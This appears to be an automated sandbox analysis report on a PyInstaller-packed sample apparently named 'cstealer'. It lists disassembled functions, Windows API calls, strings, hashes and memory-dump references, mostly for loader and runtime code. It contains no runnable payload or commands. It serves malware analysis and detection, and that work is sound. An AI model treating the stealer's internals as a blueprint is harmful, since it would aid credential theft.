                                                                                                                                                            • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction ID: e4dbb12017b752653f4ef07446e02491ece7920472fba95c24aa996713bde4a8
                                                                                                                                                            • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction Fuzzy Hash: 82218D36A04A058DEB24CF64C4806AC37F1FB44B18F140636DA1D8AAC5DF38DA85D790
                                                                                                                                                            Function 00007FF6957F69E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction ID: fb466b0dd8efc47e1c5d5f651e284a77b62f11f12e45938f7255d5ff13aa5989
                                                                                                                                                            • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction Fuzzy Hash: FB118E21A1D68282EA70DF51A401279A2E4EF85F84F5440B5EE8D9FB86CF3DEE10A740
                                                                                                                                                            Function 00007FF69580748C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction ID: 4b00378f4d2a41df0e62305a4b3daa2087d70349ea3826d9b2dd01d7a1c6b256
                                                                                                                                                            • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                                                                                            • Instruction Fuzzy Hash: 09219232A19A4286EB718F28E5403B977E1EB84FA4F544275EA5DC76D9DF3CDC018B00
                                                                                                                                                            Function 00007FF6957F0CEC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction ID: 4e60609d50dfa7926acaa53a39979d1764730b79e3be07c68294aef8e58064d2
                                                                                                                                                            • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                                                                                            • Instruction Fuzzy Hash: 9E01DB25B0875580EA24DF529900079A7D5FF45FE0F4846B1DE6D9FBDACE3CEA019300
                                                                                                                                                            Function 00007FF6957FF948 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6957FC196,?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6), ref: 00007FF6957FF99D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction ID: 74dc3fb8d6702ad59b0ed4d24f711480318a8950ac1870513884a8cdb095cb65
                                                                                                                                                            • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                                                                                            • Instruction Fuzzy Hash: 06F04F45B1A20392FE75D76595583B552D1DF88F80F4C48B0CD0ECE3D5EE1CAE819311
                                                                                                                                                            Function 00007FF6957FE3AC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6957F1514,?,?,?,00007FF6957F2A26,?,?,?,?,?,00007FF6957F4019), ref: 00007FF6957FE3EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction ID: 050faddbb362b001ca23ad8bb36ecb7cb1180bad7f9e035af701f9bc840851a4
                                                                                                                                                            • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                                                                                            • Instruction Fuzzy Hash: A4F05E04F1E29745FEB89672595867552D0CF48FA0F0902B0DD2ECD2C1DE5CED81A211
                                                                                                                                                            Function 00007FF6957E8470 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • LoadLibraryW.KERNELBASE(?,?,00000000,00007FF6957E344E), ref: 00007FF6957E8493
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                            • Opcode ID: c4c9d4e6de79a052605d9a8fca81df1ff25a4edcddc95452d00aa77451532fac
                                                                                                                                                            • Instruction ID: 6860e7ca99bb2d3807167f44aac6db9f3c13abd8c68af94bc8447097686ccd69
                                                                                                                                                            • Opcode Fuzzy Hash: c4c9d4e6de79a052605d9a8fca81df1ff25a4edcddc95452d00aa77451532fac
                                                                                                                                                            • Instruction Fuzzy Hash: 6DE08612B1425582EA289767F6454BAB191EF48FC0B489035DE0D87755DD2CD8908A00

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00007FF6957E7100 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                            • API String ID: 190572456-2208601799
                                                                                                                                                            • Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                                                                                            • Instruction ID: ab217cadbe0de37901b20484ed812af9adf1e3a3f0532655926b055c4b7cd35e
                                                                                                                                                            • Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                                                                                            • Instruction Fuzzy Hash: F8E1ED64A1EB63A1FA78DB24B9841B523E5EF44F40F9454F6D80E897A4EF7CBD488310
                                                                                                                                                            Function 00007FF6957E8770 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF6957E2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8797
                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF6957E87C6
                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6957E881C
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                            • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction ID: e37b69c1149b1483396d94e67b5fd7c2964b239be1ec4b29f46edd29efcbb3ce
                                                                                                                                                            • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction Fuzzy Hash: 5F217131A19B4285F7749B25F8442FA63E5FF88B44F840176D94DC6AA4EF3CEA498700
                                                                                                                                                            Function 00000271DC672B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction ID: cec64fa11753a91ce026b159f3fcefa427b63dcd7bfe1354fe4f10fb98b4c954
                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction Fuzzy Hash: ADB18C7221AA50CAEFB68FA9C5487A963A4FF44B84F445C16EE4D53BD4EB34C861CB40
                                                                                                                                                            Function 00007FF6957E7B60 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6957E153F), ref: 00007FF6957E7BF7
                                                                                                                                                              • Part of subcall function 00007FF6957E7D70: GetEnvironmentVariableW.KERNEL32(00007FF6957E39FF), ref: 00007FF6957E7DAA
                                                                                                                                                              • Part of subcall function 00007FF6957E7D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6957E7DC7
                                                                                                                                                              • Part of subcall function 00007FF6957F8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6957F8629
                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6957E7CB1
                                                                                                                                                              • Part of subcall function 00007FF6957E2B10: MessageBoxW.USER32 ref: 00007FF6957E2BE5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                            • Opcode ID: 2cfb989391866598dc899eea2a90682b7c72dc9e8b50c7915814af05e7576c00
                                                                                                                                                            • Instruction ID: e56b495276e51d74ecfb825ed16143f3cb3c74a37511174565fcfc2afc6f6fac
                                                                                                                                                            • Opcode Fuzzy Hash: 2cfb989391866598dc899eea2a90682b7c72dc9e8b50c7915814af05e7576c00
                                                                                                                                                            • Instruction Fuzzy Hash: 69514E11B1965255EA38EB22A9552FA62C5DF49FC0F4444B1ED0ECF7A6ED2CEE058300
                                                                                                                                                            Function 00000271DC677D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction ID: 36179cdaedb8b2b92205a9b1a9ba55335debe86d87d0744b260b5f6e382be312
                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction Fuzzy Hash: AA31307220AB808AEB709FA4E8547EE73A4FB84744F44492ADB4D57BD4EF78C558CB10
                                                                                                                                                            Function 00007FF6957EC8BC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                                                                                            • Instruction ID: 163eeb29c95c376ee8040dd08787b438ea137bdb36570b456613fe82b07be3ed
                                                                                                                                                            • Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                                                                                            • Instruction Fuzzy Hash: 84310C76609B8186EB709F60E8443FD73A4FB84B44F44407ADA4E97B99EF38DA48C710
                                                                                                                                                            Function 00007FF695806B50 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806B95
                                                                                                                                                              • Part of subcall function 00007FF6958064E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6958064FC
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: HeapFree.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB716
                                                                                                                                                              • Part of subcall function 00007FF6957FB700: GetLastError.KERNEL32(?,?,?,00007FF695803B72,?,?,?,00007FF695803BAF,?,?,00000000,00007FF695804075,?,?,00000000,00007FF695803FA7), ref: 00007FF6957FB720
                                                                                                                                                              • Part of subcall function 00007FF6957FB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6957FB697,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FB6C1
                                                                                                                                                              • Part of subcall function 00007FF6957FB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6957FB697,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FB6E6
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806B84
                                                                                                                                                              • Part of subcall function 00007FF695806548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69580655C
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806DFA
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E0B
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF695806E1C
                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69580705C), ref: 00007FF695806E43
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4070488512-0
                                                                                                                                                            • Opcode ID: 5c0435bc803def4f3738399755070787ba0f20d1cbf8e98db8d8e06c31f37944
                                                                                                                                                            • Instruction ID: f4d094dc957da16a5febb5a586ea862ea5c8519281cf234029129a5788dc941f
                                                                                                                                                            • Opcode Fuzzy Hash: 5c0435bc803def4f3738399755070787ba0f20d1cbf8e98db8d8e06c31f37944
                                                                                                                                                            • Instruction Fuzzy Hash: 69D1AEA2A0A26286E730AF32EA501F967E1FF44F94F4441B6EE4D87695DF3DEC418740
